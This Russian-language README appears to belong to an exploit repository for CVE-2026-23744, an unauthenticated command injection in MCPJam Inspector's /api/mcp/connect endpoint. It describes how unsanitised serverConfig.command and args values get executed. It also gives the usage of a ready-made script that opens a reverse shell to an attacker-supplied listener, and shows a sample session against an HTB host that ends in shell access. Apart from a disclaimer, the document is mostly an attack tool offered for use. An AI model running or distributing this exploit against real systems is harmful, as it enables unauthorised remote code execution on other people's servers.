
CVE-2026-23744 — это неаутентифицированная инъекция команд в MCPJam Inspector ≤1.4.2 через /api/mcp/connect. Этот POC эксплуатирует её путём отправки специально сформированной JSON-полезной нагрузки для выполнения произвольных команд, предоставляя обратную оболочку (reverse shell) с PTY.
Данный proof-of-concept предоставляется исключительно для авторизованных исследований в области безопасности, образовательных целей и контролируемых лабораторных сред (например, HTB, CTF или внутреннего тестирования на проникновение с явным письменным согласием). Несанкционированное использование против любой системы без разрешения является незаконным и неэтичным. Автор не несёт ответственности за неправомерное использование; пользователи несут единоличную ответственность за соблюдение всех применимых законов и нормативных требований.
CVE-2026-23744 — это уязвимость внедрения команд без аутентификации в MCPJam Inspector (версия ≤ 1.4.2).
Эндпоинт /api/mcp/connect принимает JSON-полезную нагрузку с serverConfig.command и serverConfig.args и передаёт их напрямую функции запуска системного процесса без какой-либо санитизации. Злоумышленник может отправить специально сформированный запрос для выполнения произвольных системных команд, получив reverse shell с привилегиями пользователя службы.
Этот репозиторий содержит полностью рабочий эксплойт-скрипт с опциональным автоматическим интерактивным слушателем на основе PTY (включён по умолчанию).
requests (pip install requests)Важно: Указывайте только имя хоста или IP-адрес. Скрипт автоматически добавляет http:// или https://
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
| Параметр | Описание |
|---|---|
-t, --target | Имя хоста или IP-адрес цели (обязательно) |
-p, --port | Порт цели (по умолчанию: 6274) |
-l, --lhost | Ваш IP-адрес для reverse shell (обязательно) |
-r, --lport | Порт вашего слушателя (по умолчанию: 4444) |
--ssl | Использовать HTTPS вместо HTTP |
--check-only | Только проверить уязвимость, не отправлять shell |
Скрипт запускает собственный слушатель и предоставляет вам shell прямо в вашем терминале.
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root.Этот репозиторий предназначен только для образовательных целей и авторизованного тестирования. Используйте на свой страх и риск.
Автор: Mluex0 Дата: август 2026